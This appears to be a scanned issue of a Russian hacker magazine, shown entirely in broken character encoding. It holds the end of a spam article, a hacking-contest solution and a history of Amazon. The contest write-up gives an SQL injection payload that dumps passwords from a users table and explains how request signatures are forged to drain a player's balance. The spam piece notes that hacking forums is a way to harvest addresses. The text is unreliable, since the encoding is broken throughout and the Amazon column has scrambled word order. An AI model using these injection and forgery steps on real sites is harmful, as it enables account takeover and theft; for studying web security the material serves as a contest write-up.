1 Ïåðâóþ â èñòîðèè ãëîáàëüíóþ ðàññûëêó ðåêëàìíîãî õàðàêòåðà, ñîäåðæàùóþ èíôîðìàöèþ î âûõîäå íîâîé ïðîäóêöèè, ïðîâåëà êîìïàíèÿ DEC àæ â 1978 ãîäó. 2 Àíãëèéñêîå ñëîâî «spam» ïðîèñõîäèò îò «spiced+ham», ÷òî îçíà÷àåò «âåò÷èíà ñ ïðèïðàâîé». 3 Íà äîëþ ðåêëàìíîé ðàññûëêè ïðèõîäèòñÿ áîëüøå òðåòè âñåõ ïèñåì â Èíòåðíåòå. 4 Îòêëèê îò ñïàìà ñîñòàâëÿåò â ñðåäíåì 0,2%. Åñëè îñóùåñòâëÿòü öåëåâûå ðàññûëêè, òî ýôôåêòèâíîñòü ìîæíî óâåëè÷èòü. 5 Ñàìûé ýôôåêòèâíûé ñïîñîá ñáîðà ñïàì-ëèñòîâ — âçëîì ôîðóìîâ è äðóãèõ ïðîåêòîâ, ãäå äëÿ ðåãèñòðàöèè íóæíî óêàçûâàòü e-mail.

1 MAPS RBL — Realtime Blackhole List. Îäèí

èç ïåðâûõ óäà÷íûõ ïðîðûâîâ â áîðüáå ñî ñïàìîì, èäåÿ è ðåàëèçàöèÿ êîòîðîé ïðèíàäëåæèò Ïîëó Âèêñè. Èç íàçâàíèÿ ñèñòåìû ïîíÿòíî, ÷òî îñíîâíîé åå ÷àñòüþ ÿâëÿåòñÿ áàçà ñ èìåíàìè è àäðåñàìè õîñòîâ, ñ êîòîðûõ ïðèõîäèò íåæåëàòåëüíàÿ ðåêëàìà. Ïðè÷åì ïðîñòî òàê ìàøèíà â áàçó íå çàíîñèòñÿ, à äëÿ òîãî ÷òîáû ïîïàñòü â ÷åðíûé ñïèñîê, íóæíî ñèëüíî ïîòðóäèòüñÿ, òùàòåëüíî èãíîðèðóÿ âñå ïðåäóïðåæäåíèÿ è æàëîáû ïîòåðïåâøèõ ïîëüçîâàòåëåé. Áàçà äàííûõ ñ «÷åðíûìè àäðåñàìè» ïåðèîäè÷åñêè îáíîâëÿåòñÿ. Ñåé÷àñ, ïðàâäà, ñèñòåìà RBL ïîøëà ïî ïóòè êîììåðöèè è ñòàëà ïëàòíîé, ïîïóòíî îòòîëêíóâ îò ñåáÿ íåìàëî ïîëüçîâàòåëåé. Âïðî÷åì, ïåðåæèâ ðîæäåíèå è êîììåðöèàëèçàöèþ ýòîé êîíöåïöèè, áûëè âûäâèíóòû è âîïëîùåíû â æèçíü íîâûå.

2 MAPS DUL — Dial-up User List. È ñíîâà àìáèöèîçíûé ïðîåêò êîìïàíèè MAPS (Mail Abuse Prevention System), ïðàâäà, òåïåðü íà íîâûé ëàä. Îñíîâíàÿ ïîäõîä çàêëþ÷àåòñÿ â êîíòðîëèðîâàíèå ìàøèí-çîìáè, èñïîëüçóþùèõñÿ äëÿ ðàññûëêè ïî÷òîâûõ ñîîáùåíèé. Ìàøèíà-çîìáè — ýòî, êàê ïðàâèëî, ïðîòðîÿíåííàÿ òà÷êà ðÿäîâîãî äèàëàï-þçåðà, è òàêèå êîìïû îáû÷íî ÿâëÿþòñÿ ÷àñòüþ áîëüøîãî áîòíåòà. Êàê æå îíè ðàáîòàþò? Ñìîòðè, åñëè òû êëèåíò êàêîãî-òî àáñòðàêòíîãî ïðîâà, òî äëÿ òîãî ÷òîáû îòïðàâèòü-ïîëó÷èòü ïî÷òó, òû èñïîëüçóåøü mail-ñåðâåð ñâîåãî ISP. Çîìáè-òà÷êè äåéñòâóþò íå òàê, è äëÿ ñïàìà ïîäêëþ÷àþòñÿ íàïðÿìóþ ê ìûëüíîìó ñåðâåðó òîãî äîìåíà, êîòîðûé îíè ñîáèðàþòñÿ çàõëàìèòü. Âîçìîæåí è âàðèàíò, êîãäà âñå ïîäêîíòðîëüíûå ñïàì-ìàøèíû íà÷íóò îòñûëàòü ñîîáùåíèÿ ñ êàêîãî-òî êîíêðåòíîãî äîìåíà èëè ñåðâåðà, òàê ÷òî àäðåñíîå ïðîñòðàíîñòâî è îãðàíè÷åíèå íà îòñûëêó ïèñåì ñ îäíîãî IP, êàê òû ïîíèìàåøü, óæå òóò íå ðàáîòàåò.  äàííûé ìîìåíò ñèñòåìà òîæå ÿâëÿåòñÿ ïëàòíîé. 5 ORBS — Open Relay Behaviour-Modification System. Ïðåæäå âñåãî î òîì, ÷òî æå òàêîå open relay? Ðåëåé — ýòî îáû÷íûé mail-ñåðâåð, êîòîðûé ïîçâîëÿåò íåàâòîðèçèðîâàííûì ïîëüçîâàòåëÿì îñóùåñòâëÿòü ðàññûëêó íà ëþáûå àäðåñà. Ïðîåêò ORBS ñîñòàâëÿë ÷åðíûå ñïèñêè îòêðûòûõ ðåëååâ è ïðåäîñòàâëÿë îòêðûòûé äîñòóï ê íèì. Êàçàëîñü áû, äîâîëüíî ýôôåêòèâíûé ïîäõîä, îäíàêî îí ïðèâîäèë ê òîìó, ÷òî â «÷åðíûé ñïèñîê» ïîïàäàëî áîëüøîå ÷èñëî ñåðâåðîâ, êîòîðûìè ïîëüçîâàëèñü íå òîëüêî ñïàìåðû, íî è îáûêíîâåííûå ïîëüçîâàòåëè.

080

óêðàäåííàÿ áàçà ñ ïîëüçîâàòåëÿìè è ìûëàì | ïðîãðàììà äëÿ îòñåèâàíèÿ ëåâûõ àäðåñîâ

ÆÅÑÒÜ — ÊÀÊ ÎÍÀ ÅÑÒÜ Íàøà ñòàòüÿ ìåäëåííî, íî óâåðåíî ïðèáëèæàåòñÿ ê êîíöó. ß ðàññêàçàë òåáå î êëþ÷åâûõ ìîìåíòàõ îðãàíèçàöèè ñïàì-áèçíåñà: ñáîðêå áàçû àäðåñîâ, óñòàíîâêå è íàñòðîéêå íóæíîãî ñîôòà. Ïðîáëåìà ñïàìà î÷åíü çëîáîäíåâíà, ìíå áû õîòåëîñü, ÷òîáû òû àäåêâàòíî ê íåé îòíåññÿ. Ñ îäíîé ñòî-

ðîíû, ýòî ñåðüåçíàÿ ïðîáëåìà, ñ êîòîðîé áîðåòñÿ âñå ÷åëîâå÷åñòâî. È ÷òîáû ðàçðàáàòûâàòü ýôôåêòèâíûå ìåòîäèêè, íóæíî äîñêîíàëüíî ðàçîáðàòüñÿ ñ òåì, êàê èìåííî ðàáîòàþò ñïàìåðû. Èìåííî òàêóþ öåëü ïðåñëåäîâàë äàííûé ìàòåðèàë: ïëå÷îì ê ïëå÷ó ðàçäàâèì ñïàìåðñêóþ ãàäèíó! BINARY YOUR’S z

ÒÅÕÍÈÊÀ ÁÅÇÎÏÀÑÍÎÑÒÈ Ëþáóþ ïðîáëåìó, êàê èçâåñòíî, ëåã÷å ïðåäóïðåäèòü, ÷åì ïîòîì åå äîëãî è íóäíî ðàçðåøàòü. Ñåé÷àñ ÿ ïðèâåäó ïàðó ñîâåòîâ, êàê íå ïîïàñòü â ñïàì-ëèñò: Ñòàðàéñÿ íå ñâåòèòü ñâîé ÿùèê, ïðèâëåêàÿ âíèìàíèå ïðîæîðëèâûõ ñïàì-áîòîâ. Åñëè âñå-òàêè õî÷åøü çàïîñòèòü ñâîé e-mail, çàøèôðóé åãî ÿâàñêðèïòîì: âîñïîëüçóéñÿ ïðîãðàììîé BlackMan's Mail Encoder (îíà óæå ïðîñêàëüçûâàëà â UNIT'àõ â ðàçäåëå èêñ-òóëç). Î÷åíü ÷àñòî àäðåñ ìîæíî èçîáðàçèòü íà êàðòèíêå (ïîïðîñòó íàðèñîâàòü åãî) — ïîìîãàåò ëó÷øå ìóõîáîéêè. Êîãäà áåäà âñå æå ñëó÷èëàñü, è ñïàì çàñåë ãëóáîêî â ïå÷åíêàõ, òî ñòàâü êàêîé-íèáóäü mail filter èëè ñîôòèíó ïîäîáíîãî ðîäà. Ñïåöèàëèñòû òàêæå ðåêîìåíäóþò íàñòðîèòü ïî÷òîâèê íà ïðèåì òîëüêî òåõ ïèñåì, â çàãîëîâêå êîòîðûõ ïðèñóòñòâóåò êîäîâå ñëîâî. Êîäîâîå ñëîâî ìîæíî ñîîáùèòü âñåì ñâîèì äðóçüÿì è çíàêîìûì (ìîæíî îñòàâèòü íà ôîðóìå óïîìèíàíèå, ÷òî òû ïðèíèìàåøü ïèñüìà òîëüêî ñ êîäîâûì ñëîâîì «òàêèì-òî»). Àíàëèòèêà, ñòàòüè, ñòàòèñòèêà: www.spamtest.ru Ïðî ñïàì äëÿ ÷àéíèêîâ: www.antispam.nm.ru Ñèñòåìû áîðüáû ñ ðàññûëêîé: nospam.ru Íîâîñòè ïî òåìå: www.viruslist.com/ru/spam Íàáîð î÷åíü ïîëåçíûõ ïðîãðàìì äëÿ áîðüáû ñ ðåêëàìîé: antispam.rin.ru

XÀÊÅÐ 01 /85/ 06


Õ -C CONTEST

nikitozz

 ïðåäíîâîãîäíåì êîíêóðñå òû ðåøàë ñóäüáó Ìèðà. Ïðåñòàðåëûé Äåä Ìîðîç, êàê òû ïîìíèøü, òîãäà íå íà øóòêó óâëåêñÿ àçàðòíûìè èãðàìè. Ñèäåë è öåëûé äåíü èãðàë â êàçèíî íà http://ired.inins.ru/ko. Íóæíî áûëî åãî îáàíêðîòèòü, ÷òîáû èãðàòü åìó áûëî íå íà ÷òî. Çàðåãèñòðèðîâàâøèñü â êàçèíî, íåñëîæíî áûëî ñîîáðàçèòü, ÷òî îíî ðåàëèçîâàíî â âèäå flash-ïðèëîæåíèÿ, êîòîðîå óïðàâëÿåòñÿ ñíàðóæè ñïåöèàëüíûì ñêðèïòîì. Ïîñíèôàâ òðàôèê, ëåãêî áûëî ïîíÿòü, ÷òî çà àóòåíòèôèêàöèþ îòâå÷àåò ñêðèïò lo.php, à çà ïðîöåññ èãðû – rou.php. Ïîëîâèâ ïàêåòû âî âðåìÿ èãðû, íåâîçìîæíî áûëî ïðîïóñòèòü òàêîé xml-çàïðîñ: <quest> <bet> <pole><code>4</code><money>1</money></pole> <pole><code>15</code><money>1</money></pole> </bet> <l>nikita</l> <sign>9ac520067b88cc29c5c5929825f816b0b00a50c448</sign> </quest>

Ýòîò òåêñò ïåðåäàâàëñÿ ñöåíàðèþ â ïåðåìåííîé bet POST-çàïðîñîì. Íåñëîæíî ïîíÿòü, ÷òî â ýëåìåíòå <bet> ñîäåðæèòñÿ èíôîðìàöèÿ î ñòàâêå èãðîêà. Â ýëåìåíòå <l> íàõîäèòñÿ åãî ëîãèí, à <sign> ñîäåðæèò êàêîé-òî íåïîíÿòíûé äëèííûé õýø (ïîäïèñü çàïðîñà). Íà ñàéòå êàçèíî áûëà ññûëêà íà TOP ëó÷øèõ èãðîêîâ. Â íåì ñ îãðîìíûì

XÀÊÅÐ 01 /85/ 06

îòðûâîì ëèäèðîâàë íåóãîìîííûé Äåä Ìîðîç. Ñêðèïòó ïåðåäàâàëñÿ ïàðàìåòð i. Ëåãêî áûëî ïîíÿòü, ÷òî ýòî êðèòåðèé äëÿ âûáîðêè ïîëüçîâàòåëåé: âûáèðàþòñÿ âñå, ó êîãî áàëàíñ áîëüøå i. Ïîäñòàâèâ â ïàðàìåòð êàâû÷êó, òû áû æåñòêî îáëîìàëñÿ. Íî ïðîâåñòè sql-injection âñå æå ìîæíî áûëî: i=1000 union select password,password from users Êàê ëåãêî çàìåòèòü, ïàðîëè õðàíÿòñÿ êðèïòîâàííûå, ñ íèõ ñíÿò êàêîéòî õýø. Íî îí íåñòàíäàðòíûé, êîðîòêèé, è êàê åãî ðàñøèôðîâûâàòü — íåïîíÿòíî. Ó Äåäà Ìîðîçà áûë òàêîé õýø: f0f2c33f89. Ïîñìîòðåâ íà õýø ñîáñòâåííîãî ïàðîëÿ è íà ïàðàìåòð sign, ëåãêî áûëî ïîíÿòü, ÷òî ïîñëåäíèå 10 ñèìâîëîâ sign ïîëíîñòüþ ñîâïàäàþò ñ õýøåì òâîåãî ïàðîëÿ. Èíòåðåñíî, êàê ãåíåðèðóþòñÿ îñòàëüíûå ñèìâîëû? Äåêîìïèëèðîâàâ ôëåø-ïðèëîæåíèå, òû ìîã íàéòè òàêóþ ñòðîêó: sgn=MD5.calculate(bet)+substring(MD5.calculate(p_pass),0,10); Õà! Âîò è îòâåò íà òâîé âîïðîñ. Ïåðâàÿ ÷àñòü ïîäïèñè – ýòî md5 îò xml-ýëåìåíòà <bet> ñî ñòàâêàìè è ëîãèíîì. À âòîðàÿ, êàê ìû óæå ïîíÿëè, — ýòî õýø ïàðîëÿ. Òåïåðü ñëåäè çà ðóêàìè. Ìû çíàåì ëîãèí Äåäà Ìîðîçà. Ìû çíàåì õýø åãî ïàðîëÿ. Ìû ìîæåì ïîääåëàòü ïîäïèñü ëþáîãî åãî çàïðîñà!  òîì ÷èñëå, ìîæåì ïîñòàâèòü âñå åãî äåíüãè íà îäíî åäèíñòâåííîå ïîëå. Ïîñëå òàêîãî ðîçûãðûøà ñ 97% âåðîÿòíîñòüþ Äåä Ìîðîç îáàíêðîòèòñÿ.  ýòîò ðàç ìèð ñïàñ ÷óâàê ñ íèêîì ShAnKaR.

081


ÑÖÅÍÀ ÂÇËÎÌ ÑÖÅÍÀ ///// ISSUE

TEXT MIFRILL / mifrill@riddick.ru /

ÈÑÒÎÐÈß ÑÎÇÄÀÍÈß Ìíîãèå çíàþò, ÷òî amazon.com — êðóïíåéøèé ñåòåâîé ìàãàçèí. Íî íåìíîãèå äîãàäûâàþòñÿ, ÷òî îí æå ñòàë ñàìûì ïåðâûì å-øîïîì. À íà÷àëîñü âñå â 1994 ãîäó ñ ÷åëîâåêà ïî èìåíè Äæåôôðè Ïðåñòîí Áåçîñ, âûïóñêíèêà Ïðèíñòîíñêîãî óíèâåðñèòåòà, ñïåöèàëèñòà â îáëàñòè âû÷èñëèòåëüíûõ òåõíîëîãèé è ýëåêòðîòåõíèêè.  òî âðåìÿ Äæåôôðè ðàáîòàë â Íüþ-Éîðêå, â ôèðìå D. E. Shaw, ñïåöèàëèçèðóþùåéñÿ íà ðàçðàáîòêå êîìïüþòåðíûõ òåõíîëîãèé â áèðæåâîé îáëàñòè. Äæåôô ÿâíî áûë íà ñâîåì ìåñòå: åãî êàðüåðà øëà ñòðåìèòåëüíî ââåðõ, è çà êîðîòêîå âðåìÿ îí ñòàë âèöå-ïðåçèäåíòîì êîìïàíèè, ïðè÷åì íå ñîáèðàëñÿ îñòàíàâëèâàòüñÿ íà äîñòèãíóòîì. Âñå âîêðóã ïðîðî÷èëè åìó ñâåòëîå áóäóùåå â ñôåðå ôèíàíñîâ, íî ïîòîì Áåçîñ ñäåëàë îòêðûòèå, êîòîðîå èçìåíèëî íå òîëüêî âñþ åãî æèçíü, íî è âñþ èñòîðèþ áèçíåñà. WWW òîëüêî-òîëüêî íà÷àë ïðîñà÷èâàòüñÿ èç óçêèõ íàó÷íûõ êðóãîâ â ìàññû, íè î êàêîé âåáêîììåðöèè ðå÷è, êîíå÷íî, åùå íå øëî. È âîò îäíèì âåñåííèì äíåì 1994-ãî, Äæåôôðè Áåçîñ, ïîðàçìûñëèâ è ñäåëàâ íåõèòðûå ïîäñ÷åòû, ïðèøåë ê âûâîäó, ÷òî óðîâåíü ïîëüçîâàíèÿ Èíòåðíåòîì áóäåò ðàñòè ïðèìåðíî íà 2300% â ãîä. À ðàç ëþäåé áóäåò áîëüøå, òî è çàïðîñû áóäóò íà ïîðÿäîê âûøå. Ïåðñïåêòèâà äåëàòü áèçíåñ â Ñåòè áûëà ïîòðÿñàþùåé, è, íå òåðÿÿ âðåìåíè äàðîì, Äæåôô ñòàë ðàáîòàòü íàä âîïëîùåíèåì ñâîèõ èäåé â æèçíü. Ñíà÷àëà îí èçó÷èë äåÿòåëüíîñòü 20-è ëó÷øèõ ñåðâèñîâ ïî çàêàçó òîâàðîâ ïî÷òîé, òàê êàê ýòà äåÿòåëüíîñòü áûëà áëèæå âñåõ ê òîìó, ÷òî îí çàäóìàë. Äæåôôðè çàäàëñÿ âîïðîñîì: ÷òî ýôôåêòèâíåå ïðîäàâàòü ÷åðåç Èíòåðíåò? Îòâåò íàøåëñÿ ñàì — êíèãè. Ïîëíûé êàòàëîã êíèã íåâîçìîæíî ñîñòàâèòü äëÿ ïî÷òîâîé ñèñòåìû, âåäü îí ïðîñòî íå ïîìåñòèòñÿ íè â îäíó ïîñûëêó è ïî÷òîâûé ÿùèê.  òî æå âðåìÿ íà êîìïüþòåðå ìîæíî ñîçäàòü ëþáóþ ïî îáúåìó êíèæíóþ áàçó è ëþáîé ñìîæåò åþ âîñïîëüçîâàòüñÿ. Íà ñëåäóþùèé äåíü Áåçîñ óæå ïðèáûë â ËîñÀíäæåëåñ íà Êîíâåíò àìåðèêàíñêèõ ïðîäàâöîâ êíèã ñ öåëüþ óçíàòü î êíèæíîì áèçíåñå âñå, ÷òî òîëüêî âîçìîæíî. Òàì åãî îæèäàë ïðèÿòíûé ñþðïðèç: îáíàðóæèëîñü, ÷òî âñå ëèäåðû êíèæíîãî áèçíåñà èìåþò ãîòîâûå ýëåêòðîííûå êàòàëîãè ñâîèõ òîâàðîâ. Ýòî ñóùåñòâåííî óïðîùàëî çàäà÷ó. Ïî ñóòè, îñòàâàëîñü ëèøü ñîçäàòü â Èíòåðíåòå ñòàöèîíàðíóþ ëîêàöèþ, êîòîðóþ ïîêóïàòåëè ìîãëè áû ëåãêî íàéòè è ñäåëàòü òàì ìàãàçèí, ÷òîáû çàêàç ñðàçó æå îôîðìëÿëñÿ. Îäíàêî íå âñå óâèäåëè â ýòîì ðåâîëþöèîííûé ïîäõîä. Ðàáîòîäàòåëè Áåçîñà îêàçàëèñü íå ãîòîâûìè ê òàêîìó ðèñêîâàííîìó øàãó, è èäåÿ íå íàøëà â Shaw ïîääåðæêè. Äæåôôðè ïðèøëîñü âûáèðàòü: ëèáî îòêàçàòüñÿ îò ñâîåãî çàìûñëà, ëèáî äåëàòü âñå ñàìîìó. Ïîñëåäíåå îçíà÷àëî ëèøèòüñÿ îòëè÷íîé ðàáîòû, íàäåæíûõ ïåðñïåêòèâ, ïîòåðÿòü âñå, ÷òî îí çàðàáàòûâàë íà ïðîòÿæåíèè íåñêîëüêèõ ëåò. Íî Äæåôôðè Áåçîñà ýòî íå èñïóãàëî. Óâîëèâøèñü èç Shaw è çàðó÷èâøèñü ïîääåðæêîé æåíû, îí âçÿëñÿ çà äåëî.

082

Ó ËÞÄÅÉ, ÊÎÒÎÐÛÅ ÕÎÒß ÁÛ ÈÇÐÅÄÊÀ ÁÛÂÀÞÒ “  ÈÍÒÅÐÍÅÒÅ, ÑËÎÂÎ AMAZON ÀÑÑÎÖÈÈÐÓÅÒÑß ÍÅ Ñ ÀÌÅÐÈÊÀÍÑÊÎÉ ÐÅÊÎÉ È ÍÅ Ñ ÂÎÈÍÑÒÂÅÍÍÛÌÈ ÆÅÍÙÈÍÀÌÈ, À Ñ ÎÍËÀÉÍÎÂÛÌ ÌÀÃÀÇÈÍÎÌ,  ÊÎÒÎÐÎÌ ÌÎÆÍÎ ÊÓÏÈÒÜ ÂÑÅ: ÎÒ ÄÅÒÑÊÈÕ ÈÃÐÓØÅÊ È ÒÅÕÍÈÊÈ ÄÎ ÏÎÑËÅÄÍÈÕ ÍÎÂÈÍÎÊ ÊÍÈÆÍÎÉ ÏÐÎÄÓÊÖÈÈ ÈËÈ DVD. ÊÀÆÄÛÉ ÄÅÍÜ ËÞÄÈ ÂÎ ÂÑÅÌ ÌÈÐÅ ÍÀÁÈÐÀÞÒ Â ÑÂÎÅÌ ÁÐÀÓÇÅÐÅ ÀÄÐÅÑ AMAZON.COM, ×ÒÎÁÛ ÑÎÂÅÐØÈÒÜ ÍÎÂÛÅ ÏÎÊÓÏÊÈ ÈËÈ ÓÇÍÀÒÜ Î ÍÎÂÈÍÊÀÕ. AMAZON — ÝÒÎ ÍÅ ÏÐÎÑÒÎ ÌÀÃÀÇÈÍ, ÝÒÎ ÌÍÎÃÎÌÈËËÈÎÍÍÀß ÊÎÐÏÎÐÀÖÈß, ÊÎÒÎÐÎÉ ÏÐÈÍÀÄËÅÆÈÒ ÑÎÁÑÒÂÅÍÍÛÉ ÏÎÈÑÊÎÂÈÊ A9, ÑÀÌÀß ÁÎËÜØÀß ÊÈÍÅÌÀÒÎÃÐÀÔÈ×ÅÑÊÀß ÁÀÇÀ ÄÀÍÍÛÕ INTERNET MOVIE DATABASE (IMDB.COM) È ÖÅËÛÉ ÐßÄ ÄÎ×ÅÐÍÈÕ ÊÎÌÏÀÍÈÉ. ÐÀÇÂÅ ÌÎà ÑÎÇÄÀÒÅËÜ Å-ØÎÏÀ 10 ËÅÒ ÍÀÇÀÄ ÏÐÅÄ-

ÏÎËÎÆÈÒÜ, ×ÒÎ ÅÃÎ ÄÅÒÈÙÅ ÏÐÈÌÅÒ ÒÀÊÎÉ ÐÀÇÌÀÕ?

ÑÈÑÒÅÌÀ ÐÀÁÎÒÛ Êàê æå «Àìàçîí» ðàáîòàåò íà ñåãîäíÿøíèé äåíü? Òî÷íî òàê æå, êàê è òûñÿ÷è èíòåðíåòìàãàçèíîâ ïî âñåìó ìèðó. Âåäü èìåííî ïî îáðàçó è ïîäîáèþ amazon.com ôóíêöèîíèðóþò âñå ýòè ñàéòû. Âåñü ýòîò áàçèñ ïðèäóìàí Äæåôôðè Áåçîñîì, õîòÿ ðàçìàõ «Àìàçîíà», êîíå÷íî, âðÿä ëè ñîïîñòàâèì ñ äåÿòåëüíîñòüþ åãî êîíêóðåíòîâ. Êîìïàíèÿ ïðèêëàäûâàåò âñå óñèëèÿ, ñòàðàÿñü áûòü äåéñòâèòåëüíî «ìàãàçèíîì ïëàíåòû», à íå êàêèõ-òî îòäåëüíûõ ñòðàí. Äëÿ îáëåã÷åíèÿ æèçíè ïîêóïàòåëåé ïðåäñòàâèòåëüñòâà «Àìàçîíà» èìåþòñÿ â âîñüìè ñòðàíàõ ìèðà: Êàíàäå, Âåëèêîáðèòàíèè, Èñïàíèè, Ãåðìàíèè, Àâñòðèè, Ôðàíöèè, Êèòàå è ßïîíèè. Æèòåëÿì îñòàëüíûõ ñòðàí íå ñòîèò ðàññòðàèâàòüñÿ: ìàãàçèí îáñëóæèò òåáÿ, äàæå åñëè òû æèâåøü â êàêîé-íèáóäü ãëóáèíêå. Ïðîñòî ïðåäñòàâèòåëüñòâà óïðîùàþò äåëî è ïåðåñûëêó çàêàçîâ. Ïî ïîâîäó ïîñëåäíåãî ìîæíî íå áåñïîêîèòüñÿ: ìàãàçèí ãàðàíòèðóåò ñîõðàííîñòü äàæå ñàìîãî õðóïêîãî òîâàðà, òàê êàê «Àìàçîí» ñîòðóäíè÷àåò ñ ëèäåðàìè òðàíñïîðòèðîâêè UPS, DHL, FedEx è A1. Íî äàæå åñëè ñ çàêàçîì ÷òî-òî ïðîèçîéäåò, íà ñàéòå îáåùàþò âåðíóòü ïîòðà÷åííûå äåíüãè è â íåêîòîðûõ ñëó÷àÿõ äàæå âûïëàòèòü êîìïåíñàöèþ.

Ñïîñîáîâ îïëàòû ìíîãî. Óïîð, êîíå÷íî, äåëàåòñÿ íà âñåâîçìîæíûå êðåäèòíûå êàðòû, íî ïðèíèìàþòñÿ è áàíêîâñêèå ïåðåâîäû, äåíåæíûå ÷åêè âñåõ ìàñòåé, ïðîñòûå äåíåæíûå ïåðåâîäû è ïîäàðî÷íûå ñåðòèôèêàòû îò ñàìîãî àmazon.com. Ó «Àìàçîíà» ñóùåñòâóåò öåëûé ðÿä ñèñòåì ñêèäîê, áîíóñîâ è ñïåöèàëüíûõ ïðåäëîæåíèé äëÿ ïîñòîÿííûõ êëèåíòîâ. Ñþäà âõîäÿò òå ñàìè ïîäàðî÷íûå ñåðòèôèêàòû, êîòîðûìè ìîæíî ðàñïëàòèòüñÿ çà î÷åðåäíóþ ïîêóïêó. ß íè÷åãî íå ñêàçàë ïî ïîâîäó íàâèãàöèè è èíòåðôåéñà. Íàâèãàöèÿ ñòîëü ïðîñòà è èíòóèòèâíî ïîíÿòíà, ÷òî ïîïðîñòó íå î ÷åì ãîâîðèòü. Äæåôôðè ïðèëîæèë âñå óñèëèÿ, ÷òîáû ïîñåòèòåëÿì áûëî ìàêñèìàëüíî êîìôîðòíî. Åäèíñòâåííîå, â ÷åì ìîæíî çàïóòàòüñÿ, — òàê ýòî â ðàçíîîáðàçèè âûáîðà. Æåëàåòå êóïèòü äðåëü? Èëè æåíñêèå ñàïîæêè? À, áûòü ìîæåò, õîòèòå òî÷íóþ êîïèþ ñâåòîâîãî ìå÷à èç «Çâåçäíûõ âîéí»? Âñå ê âàøèì óñëóãàì! Òîëüêî òîâàðû íåëüçÿ ïîíþõàòü è ïîùóïàòü: òåõíîëîãèè äî òàêîãî ïîêà íå äîøëè. Íî, åñëè â áëèæàéøåì áóäóùåì ïîäîáíîå ñòàíåò âîçìîæíûì, ìîæåøü íå ñîìíåâàòüñÿ, ïåðâûì ÷åëîâåêîì, êòî íàéäåò ýòîìó ïðèìåíåíèå, ñòàíåò Äæåôôðè Ïðåñòîí Áåçîñ. BINARY YOUR’S z

XÀÊÅÐ 01 /85/ 06


ÈÑÒÎÐÈß ÎÄÍÎÃÎ Å-Ø ØÎÏÀ AMAZON — ÑÀÌÛÉ ÏÎÏÓËßÐÍÛÉ ÌÀÃÀÇÈÍ Â ÑÅÒÈ

2003 / ÑÒÀÍÎÂËÅÍÈÅ AMAZONE TIMELINE / 1994-2

×åòâåðòîãî èþëÿ Äæåôô ñ ñóïðóãîé ïðèëåòåëè â Òåõàñ. Îòòóäà óæå ìàøèíîé íàïðàâèëèñü â Ñèýòë, ãäå èõ æäàëà âñòðå÷à ñ êðóïíûì îïòîâèêîì Èíãðýìîì è âîçìîæíîñòü ïðèìåíèòü êîìïüþòåðíûå òàëàíòû â äåëå. Âñå ïðîèñõîäèëî â òàêîé ñïåøêå, ÷òî äàæå áèçíåñ-ïëàí ñîñòàâëÿëñÿ â äîðîãå, ïîêà æåíà âåëà ìàøèíó. Èçíà÷àëüíî êîìïàíèþ ðåøèëè íàçâàòü Êàäàáðà (Cadabra), îò ìàãè÷åñêîãî ñëîâà «Àáðà-Êàäàáðà». Íî ïîñëå ðÿäà îáñóæäåíèé è ïðåäïîëîæåíèé, ÷òî Cadabra.com ìîæåò ó ìíîãèõ âûçâàòü àññîöèàöèþ ñ cadaver (òåëî, òðóï), èìÿ ñìåíèëè íà Amazon, â ÷åñòü âåëèêîé Þæíîàìåðèêàíñêîé ðåêè. Ñâîèì èíâåñòîðàì Áåçîñ ÷åñòíî ïðèçíàëñÿ, ÷òî øàíñ ïîòåðÿòü âñå âëîæåíèÿ ñîñòàâëÿåò ïðèìåðíî 70%, íî ðîäèòåëè Äæåôôà, âëîæèâøèå â äåëî $300 000, âåðèëè â ñûíà. «Ìû äåëàëè ñòàâêó íå íà Èíòåðíåò», — ñêàçàëà ÷åðåç íåñêîëüêî ëåò ìàòü Áåçîñà. — Ìû ñòàâèëè íà Äæåôôà». Ê êîíöó äåêàäû, áóäó÷è âëàäåëüöàìè 6% àêöèé êîìïàíèè, îíè ñòàëè ìèëëèîíåðàìè. Ê íàñòîÿùåìó âðåìåíè êîðïîðàöèþ äåëèëè òðèæäû, è òåïåðü â ðóêàõ ñåìüè Áåçîñîâ íàõîäèòñÿ ïðèìåðíî òðåòü àêòèâîâ àmazon.com.

XÀÊÅÐ 01 /85/ 06

Èçíà÷àëüíî ìàãàçèí îáîñíîâàëñÿ â ãàðàæå îáû÷íîãî äîìà ñ äâóìÿ íà ñïàëüíÿìè. Äæåôô óñòàíîâèë òðè êîìïüþòåðà Sun Microstations äâåðåé. òîâ ôðàãìåí èç ðóêàìè íûìè ñîáñòâåí ûå ñòîëû, ñîáðàíí Ïðîâîäà è øíóðû ñ ïîìîùüþ óäëèíèòåëåé ïðîòÿíóëè ïðÿìî â ãàë ðàæ. Êîãäà ïðîòîòèï ñàéòà áûë ãîòîâ è çàïóùåí, Äæåôô ïîïðîñè åðàìè áåòà-òåñò ñòàòü õ çíàêîìû è äðóçåé 300 ÷åëîâåê èç ÷èñëà ñâîèõ ïðîåêòà. Ïðîâåðêà ïðîøëà íà óðà — ñèñòåìà ðàáîòàëà ïðåêðàñíî íà âñåõ ïëàòôîðìàõ. È 16-ãî èþëÿ 1995 ãîäà Áåçîñ îòêðûë ñàéò ãäå ìèðó, ïîïðîñèâ âñåõ äðóçåé ðàñïðîñòðàíÿòü èíôîðìàöèþ âåçäå, ìîæíî.  òå÷åíèå 30 äíåé àmazon.com ðàáîòàë áåç ðåêëàìíîé ïîääåðæêè â ïðåññå, ïðîäàæà êíèã ïðîèçâîäèëàñü äëÿ âñåõ 50 àìåðèêàíñêèõ øòàòîâ è äëÿ 45 çàðóáåæíûõ ñòðàí. Ê ñåíòÿáðþ ïðîäàæè ìàãàçèíà ñîñòàâèëè $20 000 â íåäåëþ. Äæåôôðè Áåçîñ ñî ñâîåé êîìàíäîé ïðîäîëæàë ñîâåðøåíñòâîâàòü ñàéò, ââîäÿ â îáèõîä ðàíåå íåñóùåñòâîâàâøèå ïîíÿòèÿ one-click shopè ping (ïîêóïêà îäíèì êëèêîì), customer reviews (îòçûâû êëèåíòîâ) e-mail order verification (ïîäòâåðæäåíèå çàêàçà ïî e-mail).

083


CÖÅÍÀ ///// ISSUE

